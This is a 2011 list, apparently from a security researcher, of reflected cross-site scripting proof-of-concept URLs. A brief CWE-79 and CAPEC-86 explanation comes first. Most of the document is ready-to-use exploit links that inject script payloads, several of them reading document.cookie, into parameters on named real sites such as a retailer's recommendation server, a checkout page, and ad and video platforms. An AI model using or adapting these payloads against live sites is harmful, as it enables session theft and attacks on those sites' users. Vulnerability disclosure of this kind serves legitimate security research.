| |
. | AUTHOR: Hoyt LLC Research |
. | Keywords: Cross Site Scripting, XSS, SQL Injection, Proof of Concept, URI, Click to Execute, CWE-79, CAPEC-86, Unforgivable Vulnerabilities |
. | Last Updated: March 6, 2011 1358 GMT |
. | Description: Spreadsheet of Unforgivable Vulnerabilities in URI Format |
. | HOW TO: Use a Proxy and Repeater tool such as ZAPROXY! |
. | CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') |
. | CAPEC-86: Embedding Script (XSS ) in HTTP Headers |
. | Description Summary - The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
. | The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. |
. | |
. | |
. | http://recs.richrelevance.com/rrserver/p13n_generated.js?a=5387d7af823640a7&ts=1298696265845&cis=|72384&p=1a6ddbd&re=True&cts=http://www5.jcpenney.com/jcp/&pt=|ensemble_page.content1&s=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ctp=|0:cmOrigId%25253D1a6ddbd%252526cmTypeFlag%25253DRichRel%252526cmCatID%25253Dhomepage%25257C723842c3c1';alert(1)//3dbbc323ad9&pref=http://www4.jcpenney.com/jcp/XGN.aspx%3Fn%3D4294953363%26catsel%3D4294953363--comforters%2B%2B%2Bbedspreads%26deptid%3D70750%26pcatid%3D70750%26catid%3D72384%26cattyp%3DSAL%26dep%3DBEDDING%26pcat%3DBEDDING%26cat%3DSale%26refpagename%3DDefault%25252Easpx%26refdeptid%3D%26refcatid%3D%26cmAMS_T%3DT1%26cmAMS_C%3DC3%26CmCatId%3Dhomepage&l=1 |
. | http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22?6060c'-alert(document.cookie)-'2045e17825d=1 |
. | https://secure.avangate.com/order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5/6e9f0%22%3E%3Cscript%3Ealert(1)%3C/script%3E516e15aff28be73 |
. | http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 |
. | http://trc.taboolasyndication.com/dispatch/?publisher=veoh&list-id=rbox-blended&format=jsonc34fc%3Cscript%3Ealert(document.cookie)%3C/script%3E1395c3bee03&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http://burp/show/11 |
. | http://managedq.com/search.php?q=o/65f22%22;alert(1)//e219070d6ebbama |
. | http://ll-appserver.veoh.com/styles/veoh.css?version=AFrontend.5.5.4.103888ebc%3Cscript%3Ealert(1)%3C/script%3E9e1cf63d45e |
. | https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=1201083812220968228%22%3E%3C/script%3EHoyt.LLC.Research%3Cscript%3Ealert(1)%3C/script%3ESays.API.XSS.is.DANGEROUS |
. | http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1 |